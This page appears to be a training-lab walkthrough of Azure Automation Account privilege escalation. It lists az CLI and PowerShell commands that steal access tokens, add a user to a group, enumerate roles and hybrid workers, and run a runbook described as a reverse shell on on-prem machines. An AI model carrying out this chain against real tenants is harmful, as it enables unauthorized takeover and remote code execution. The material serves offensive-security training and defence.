Automation Account

Automation Account comes very handy in privilege escalation:

– Usually, high privileges for the Managed Identity.

– Often, clear-text credentials can be found in Runbooks. For example, a PowerShell runbook may have admin credentials for a VM to use PSRemoting.

– Access to connections, key vaults from a runbook.

– Ability to run commands on on-prem VMs if hybrid workers are in use.

– Ability to run commands on VMs using DSC in configuration management.

This attack requires a shell or interactive session with a user in Azure.

Check if there is a user logged into az cli on the machine

az ad signed-in-user show

find another user or group that has interesting permissions on an automation account

az extension add --upgrade -n automation
az automation account list

Check for objects owned by the current user, looking for signs of automation, run books, or automation admins.

az ad signed-in-user list-owned-objects

Interact with Entra ID with Graph API

az account get-access-token --resource-type ms-graph

$Token = “eyJ0..”
Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)

Add user as member of owned group

$params = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/f66e133c-bd01-4b0b-b3b7-7cd949fd45f3"
}

New-MgGroupMemberByRef -GroupId e6870783-1378-4078-b242-84c08c6dc0d7 -BodyParameter $params

If already a member, you will see the below error

New-MgGroupMemberByRef : One or more added object references already exist
for the following modified properties: 'members'.
Status: 400 (BadRequest)

Check for automation accounts

az automation account list

List roles assigned to user

az role assignment list --assigneeMarkDWalden@defcorphq.onmicrosoft.com

If no output is returned, request na access token for ARM and aad-graph to use Az PowerShell.

az account get-access-token
az account get-access-token --resource-type aad-graph
$AADToken = 'eyJ0…'
$AccessToken = 'eyJ0…'
Connect-AzAccount -AccessToken $AccessToken -GraphAccessToken $AADToken -AccountId f66e133c-bd01-4b0b-b3b7-7cd949fd45f3

Get-AzRoleAssignment -Scope /subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Engineering/providers/Microsoft.Automation/automationAccounts/HybridAutomation

Look for roles

Look in the output for RoleDefinitionName :, for example, if the role is Contributer we can do some things with the automation account and run books.

Check if hybrid worker group is in use by the automation account

Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Engineering

Having a hybrid runbookworker will allow us to execute commands/scripts on the on-prem infrastructure.

Create, publish, and run a runbook

This uses a simple PowerShell reverse shell, but will need a true payload for real life.

Here studentx.ps1 is a reverse shell.

Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose

Publish the runbook so you can use it. Note the -RunbookName is just an example here.

Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Start the runbook using previously gathered information.

Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

PreviousPrivilege Escalation NextTransferring Files

Last updated 4 hours ago

az account get-access-token az account get-access-token --resource-type aad-graph $AADToken = 'eyJ0…' $AccessToken = 'eyJ0…' Connect-AzAccount -AccessToken $AccessToken -GraphAccessToken $AADToken -AccountId f66e133c-bd01-4b0b-b3b7-7cd949fd45f3